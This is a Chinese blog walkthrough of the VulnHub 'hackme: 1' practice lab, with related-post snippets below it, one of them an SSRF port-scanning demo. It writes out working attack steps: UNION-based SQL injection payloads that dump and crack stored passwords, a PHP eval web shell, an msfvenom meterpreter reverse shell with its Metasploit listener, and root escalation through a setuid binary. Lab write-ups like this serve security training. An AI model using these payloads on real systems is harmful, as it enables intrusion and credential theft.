hackme1新手教学

最新推荐文章于 2024-07-29 21:48:34 发布
最新推荐文章于 2024-07-29 21:48:34 发布
阅读量9k 收藏 3
点赞数
文章标签: 数据库 php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/w2411313/article/details/127299405
版权

靶机地址:hackme: 1 ~ VulnHubhttps://www.vulnhub.com/entry/hackme-1,330/

1.将靶机下载并导入到vm虚拟机当中,开启hackme1靶场。

2.打开kali虚拟机输入arp-scan -l 查看同一网段的所有IP,寻找靶机的IP地址,发现靶机IP为192.168.47.137

3.通过ifconfig查看kali的IP地址,此处kali作为攻击机。

4.通过masscan --rate=100000 -p 0-65535 192.168.47.137

对靶机进行端口扫描,发现开放80和22端口。

5.通过nmap -T4 -sV -O -p 22,80 192.168.47.137

对80和22端口进行nmap详细扫描查看端口的具体信息。

6.通过dirb http://192.168.47.137命令查看80端口的详细目录,发现目录为upload。

7.访问http://192.168.47.137

8.点击sign up now进行注册,并登录。

9.接下来查看是否有sql注入,点击search可以查看所有信息。

10.在查询框输入OSINT’and 1=1#发现有回显,说明存在注入。

11.输入order by 3#发现有回显,输入order by 4#没有回显,说明字段数为3.

12.输入-1' union select database(),2,3# ,查看数据库具体信息,得到数据库名称为webapphacking 。

13.输入-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#,查询数据库的所有表,得到数据库中存在books表和users表;猜测users表包含账户信息 。

14.输入-1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#,查看user表中的所有列,发现有user和password,猜测账户密码很可能存在这两个列中。

15.输入-1' union select group_concat(user),group_concat(pasword),3 from users#,查看user和password的具体信息,发现用户名其中一个是superadmin,最有可能为管理员账户,得到用户名和密码,但是密码被md5加密。

16.对密码进行md5解密,推荐解密网站md5在线加密解密,得到解密结果为Uncrackable。

17.点击sign out of your account进行登录

18.接下里我们getshell,我们在桌面创建一句话木马的php格式文件,一句话木马为<?php eval(@$_POST['wjq']); ?>,点击选择文件进行上传,然后点击upload image。

19.根据页面提示文件上传至uploads中,所以一句话木马的路径为,192.168.47.137/uploads/1.php。

20.用蚁箭进行链接,可以查看后台文件,相当于拿到了服务器的部分权限

21.在kali中输入msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.47.130 lport=4444 -f elf >4444.elf,利用msfvenom生成攻击机的木马文件。

22.然后将生成的木马文件复制到本机win10桌面上传到中国蚁剑,之后只要服务器运行此文件,就会被监听。

23.在kali设置监听,输入代码

msfdb

use exploit/multi/handler

set payload linux/x64/meterpreter/reverse_tcp

set lhost 192.168.47.137 #目标靶机IP

set lport 4444

explort

24.随后在中国蚁剑木马文件的目录下打开终端,设置木马文件的权限并运行文件(如果没有设置权限就会出现下图第一次运行文件时的情况:提示权限不足),输入chmod +x 4444.elf,提权,再运行4444.elf文件

25.运行后,在kali中会监听到服务器,此时获得服务器的shell。

26.切换到shell,输入whoami可查看具体信息

27.获取shell后切换到python终端,输入python -c 'import pty;pty.spawn("/bin/bash")'

28.输入cd home/legacy跳转到home/legacy目录下,ls发现 ./touchmenot文件

输入 ./touchmenot,运行获得root

w2411313
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
BLE_HackMe:低功耗蓝牙低硬件HackMe
03-13
低功耗蓝牙低硬件HackMe 该项目旨在介绍BLE协议及其安全性基础。 具有蓝牙接口的标准Windows 10计算机将模拟各种BLE设备-在无线电层上的工作原理与真实设备完全相同。 在一系列复杂性越来越高的任务中,允许您熟悉...
探索Hanime1Plugin:一款强大的动画插件解析与应用
gitblog_00063的博客
04-24 7144
探索Hanime1Plugin:一款强大的动画插件解析与应用 项目地址:https://gitcode.com/feiyeyuanye/Hanime1Plugin 项目简介 Hanime1Plugin 是一个针对动画和动漫爱好者的开源项目,旨在提供一种高效、便捷的方式来增强观看体验。通过这款插件,用户可以在观看在线动画时享受到更多的自定义功能和服务。 技术分析 Hanime1Plugin的核心是一...
利用kali Linux 渗透windows 操作系统
YJlio的博客
03-05 7594
利用kali Linux 渗透windows 操作系统 一、实验目的:使用kali生成木马,渗透windows系统 二、实验内容: 使用kali中的Metasploit生成木马,控制windows系统 三、实验环境 需要从VMware Workstation 中创建两台虚拟机 一台kali linux和一台靶机windows系统 1、攻击者ip(kali) 192.168.63.21 2、靶机ip(windows)192.168.63.20 四、实验步骤 先将虚拟机的网络模式修改为桥接模
Hackme靶机 保姆级最详细教程!!!
最新发布
2401_85783544的博客
07-29 505
最后直接dump,把内容下载下来,我们看到了superadmin超级管理员,他的密码是加密状态,进行解密。2.用御剑扫描一下1-255的端口,发现59和60之间出现了一个奇怪的131,我们可以尝试访问一下,发现登录成功说明131就是靶机的地址.4.输入刚才注册的用户名和密码,可以看到登录进来了,我们输入sql注入语句 ' or 1=1 #9.这个时候我们在访问之前的一个上传目录uploads,可以看到我们上传的6.php。8.我们去直接登录,可以看到上传按钮,这个时候上传一个一句话木马。
靶机16 GROTESQUE: 2
honest_gg的博客
10-12 1163
简介:获取标志(难度: 中等)
DC-1靶机渗透
weixin_62485906的博客
06-23 1309
关于kali渗透DC-1靶机
靶机渗透 hackme-1(详解,适合新手
君莫hacker的博客
09-05 6574
靶机hackme-1的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘SQL注入文件上传漏洞三、 漏洞利用反弹shell方法一:一句话木马,蚁剑连接反弹shell方法二:system命令执行四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-1,330/ 发布时间 18 Jul 2019 作者 x4bx54 难度 简单 靶机基本介绍: “hackme”是一个
sedemo_hackme
03-29
sedemo_hackme sedemo_hackme
Hackme:Hackme is a network security answer platform,Hackme网络安全答题平台
04-27
1、使用前先配置好OT数据库。 配置文件的位置为Application\Common\Conf\config.php /* 默认数据库配置为如下所示,按实际情况修改 */ 'DB_TYPE' => 'mysql', // 数据库类型 'DB_HOST' => '127.0.0.1', // 服务器...
hackme.inndy.tw的rop2题目
10-15
这是https://hackme.inndy.tw/scoreboard/的rop2题目如果网站被墙或者关闭请从这里下载
海浪模型的matlab代码-HackMe:HackMe项目的官方公共存储库
05-27
海浪模型的matlab代码HackMe项目的官方公共存储库。 想要贡献吗? 联系Harris Mohamed()或Amith Chivikula() HackIllinois 2019海洋资源软件(Particle提出),The Very Hungry Caterpillar(Caterpillar提出)...
靶场-hackeme1
weixin_58602402的博客
06-12 198
1.在/home/legacy路径下发现二进制文件touchmenot,执行二进制文件。Linux OS' order by 1# //正常。Linux OS' order by 4# //不正常。3.编写反弹shell的脚本,shell.py,并利用蚁剑上传并执行。Linux OS' order by 3# //正常。Linux OS' and 1=2 # //不正常。Linux OS' and 1=1 # //正常。7.爆破数据库名,用户名,版本号。
HACKME-1 打靶
weixin_57315671的博客
06-16 247
8.查看webapphacking库所有的表 -1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#9.查看users表中所有的列 -1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#
kali与靶机网络配置问题
leo788的博客
01-04 3666
前提:kali宿主机和靶机都使用的NAT网络配置,然而无论是arp-scan还是nmap还是netdiscover都找不到靶机ip,正常情况下可以找到。
靶机渗透-kali&Hackathon
weixin_73532217的博客
03-18 1242
渗透,靶机,hackathon
1、靶机——Pinkys-Place v3(1)
qq_55202378的博客
09-20 730
Pinkys-Place
找不到靶机的IP怎么办,教你几步就会了
热门推荐
qq_20765511的博客
02-23 1万+
家人们最近从老家回来正在找工作,没时间,现在才开始写笔记 之前我学渗透的时候看着看着后面很简单,但是第一步就没了,找不到IP地址,这就很烦了,然后我在网上找,什么进入管理者界面修改啊什么的,但是我照着做了一遍,就是不知道IP是什么,不需要搞那些花里胡哨的东西 我教你个很简单的方法 我这个靶机是找朋友要的,所以我不知道IP地址,我看他们都是开机就会直接显示IP地址没有,我得自己找 一般来说靶机通常不会太大,通常是用 VirtualBox 这个虚拟机 打开来就是这样 你只需要在虚拟机VirtualBox 靶机
hackme 靶场复现
m0_68471358的博客
08-02 298
靶机下载地址:hackme: 1 ~ VulnHubhttps://www.vulnhub.com/entry/hackme-1,330/将靶机下载并导入到VMware虚拟机当中,开启hackme1靶场,并开启kali当作攻击机将两台虚拟机均设为桥接模式二.靶机渗透。
hackme-1靶机渗透详解
大熊
06-12 526
hackme”是一个初学者难度等级框。目标是通过web漏洞获得有限的权限访问,然后权限升级为root。 此靶机重点在于SQL注入,爆出管理员用户及密码。
ctf 监听端口_SSRF 漏洞分析与利用(含 CTF 例题)
06-07
SSRF(Server Side Request Forgery)漏洞是一种常见的Web安全漏洞,攻击者可以利用该漏洞伪造服务器端发起的请求,例如访问内部系统或者外部网络等,从而造成安全风险。 SSRF漏洞的利用方式有很多种,其中一种典型的方式是利用SSRF漏洞进行端口扫描。攻击者可以构造特定的请求,使目标服务器向攻击者指定的IP地址和端口发起连接,从而达到端口扫描的目的。 下面我们就来分析一下SSRF漏洞的利用过程。 一、漏洞利用过程 1. 构造恶意请求 攻击者可以构造恶意请求,将需要访问的目标URL替换成攻击者指定的URL,从而实现伪造请求的目的。 例如,以下请求中的网址参数即为存在SSRF漏洞的关键点: ``` http://example.com/?url=http://attackersite.com ``` 攻击者可以将其替换成需要访问的目标URL,例如: ``` http://example.com/?url=http://127.0.0.1:22 ``` 2. 利用漏洞进行端口扫描 当攻击者构造完恶意请求后,目标服务器会向攻击者指定的IP地址和端口发起连接,如果连接成功,说明该端口开放,否则该端口关闭。 攻击者可以通过不断尝试不同的端口,从而达到端口扫描的目的。 二、实战演练 下面我们将通过一个CTF例题来演示如何利用SSRF漏洞进行端口扫描。 1. 环境搭建 我们可以使用Docker来搭建漏洞环境,具体步骤如下: 1)拉取Docker镜像 ``` docker pull bluetonem/hackme-ssrf ``` 2)启动容器 ``` docker run -d -p 8080:80 bluetonem/hackme-ssrf ``` 2. 漏洞利用 访问http://127.0.0.1:8080/,可以看到一个简单的Web应用程序,该应用程序可以通过URL参数获取指定网址的源代码。 我们可以利用SSRF漏洞,将目标网址替换成攻击者指定的URL,从而实现伪造请求的目的。 例如,以下请求中的网址参数即为存在SSRF漏洞的关键点: ``` http://127.0.0.1:8080/?url=http://attackersite.com ``` 攻击者可以将其替换成需要访问的目标URL,例如: ``` http://127.0.0.1:8080/?url=http://127.0.0.1:22 ``` 如果该端口开放,返回的页面会显示"SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2"等信息,说明端口开放。如果该端口关闭,则返回的页面会显示"Connection refused"等信息,说明端口关闭。 通过不断尝试不同的端口,可以实现端口扫描的目的。 三、防御措施 为了避免SSRF漏洞的产生,需要采取以下安全措施: 1. 对用户输入的URL进行严格验证,确保只访问合法的URL。 2. 对URL进行白名单验证,只允许访问指定的URL,避免访问不受信任的URL。 3. 对访问的目标URL进行限制,避免访问内部系统或者外部网络等不安全的URL。 4. 对服务器的网络端口进行限制,避免访问不受信任的IP地址和端口。 5. 对服务器进行定期的安全审计,及时发现和修复漏洞。 以上是关于SSRF漏洞分析与利用的详细介绍,希望对你有所帮助。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值